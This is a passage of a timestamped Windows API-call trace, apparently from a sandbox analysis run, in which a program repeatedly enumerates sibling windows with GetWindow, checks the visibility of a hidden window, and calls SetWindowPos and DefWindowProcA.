uCmd=0x2) returned 0x1017e [0057.486] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.486] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.486] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.486] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.486] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.486] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.486] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.486] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.487] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.487] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.487] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.487] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.487] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.487] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.487] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.487] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.487] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.487] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.487] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.487] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.487] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.487] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.487] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.487] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.487] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.487] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.487] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.487] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.487] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.487] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.487] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.487] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.487] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.487] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.487] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.487] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.487] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.487] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.487] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.488] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.488] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.488] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.488] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.488] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.488] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.488] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.488] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.488] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.488] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.488] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.488] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.488] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.488] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.488] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.488] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.488] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.488] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.488] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.488] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.488] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.488] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.488] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.488] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.488] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.488] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.488] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.488] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.488] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.488] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.488] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.489] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.489] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.489] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.489] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.489] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.489] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.489] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.489] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.489] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.489] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.489] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.489] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.489] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.489] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.489] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.489] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.489] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.489] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.489] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.489] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.489] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.489] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.489] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.489] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.489] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.489] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.489] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.489] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.489] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.490] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.490] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.490] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.490] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.490] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.490] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.490] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.490] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.490] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.490] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.490] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.490] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.490] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.490] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.490] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.490] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.490] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.490] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.490] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.490] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.490] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.490] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.490] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.490] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.490] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.490] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.491] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.491] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.491] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.491] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.491] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.491] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.491] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.491] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.491] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.491] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.491] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.491] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.491] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.491] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.491] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.491] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.491] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.491] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.491] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.491] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.491] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.491] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.491] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.491] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.492] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.492] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.492] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.492] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.492] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.492] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.492] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.492] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.492] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.492] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.492] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.492] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.492] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.492] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.492] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.492] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.492] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.492] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.492] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.492] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.492] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.492] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.492] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.492] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.493] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.493] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.493] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.493] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.493] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.493] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.493] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.493] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.493] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.493] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.493] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.493] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.493] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.493] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.493] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.493] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.493] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.493] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.493] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.493] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.493] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.493] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.493] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.493] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.494] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.494] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.494] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.494] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.494] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.494] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.494] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.494] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.494] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.494] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.494] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.494] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.494] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.494] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.494] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.494] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.494] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.494] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.494] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.494] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.494] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.494] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.494] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.494] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.494] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.494] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.495] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.495] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.495] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.495] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.495] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.495] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.495] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.495] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.495] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.495] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.495] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.495] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.495] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.495] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.495] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.495] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.495] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.495] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.495] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.495] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.495] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.495] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.495] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.495] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.495] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.495] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.495] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.495] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.495] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.495] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.495] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.495] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.496] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.496] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.496] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.496] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.496] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.496] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.496] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.496] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.496] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.496] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.496] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.496] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.496] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.496] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.496] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.496] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.496] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.496] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.496] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.496] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.496] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.496] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.496] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.496] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.496] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.496] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.496] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.496] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.496] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.496] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.497] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.497] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.497] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.497] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.497] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.497] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.497] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.497] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.497] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.497] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.497] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.497] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.497] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.497] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.497] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.497] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.497] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.497] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.497] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.497] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.497] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.497] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.497] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.497] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.497] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.497] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.497] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.497] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.497] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.497] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.497] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.497] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.498] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.498] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.498] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.498] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.498] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.498] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.498] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.498] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.498] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.498] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.498] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.498] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.498] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.498] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.498] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.498] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.498] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.498] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.498] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.498] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.498] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.498] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.498] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.498] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.498] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.498] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.498] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.499] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.499] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.499] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.499] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.499] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.499] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.499] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.499] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.499] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.499] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.499] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.499] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.499] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.499] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.499] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.499] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.499] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.499] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.499] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.499] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.499] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.499] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.499] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.499] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.499] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.499] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.499] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.499] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.499] GetWindow 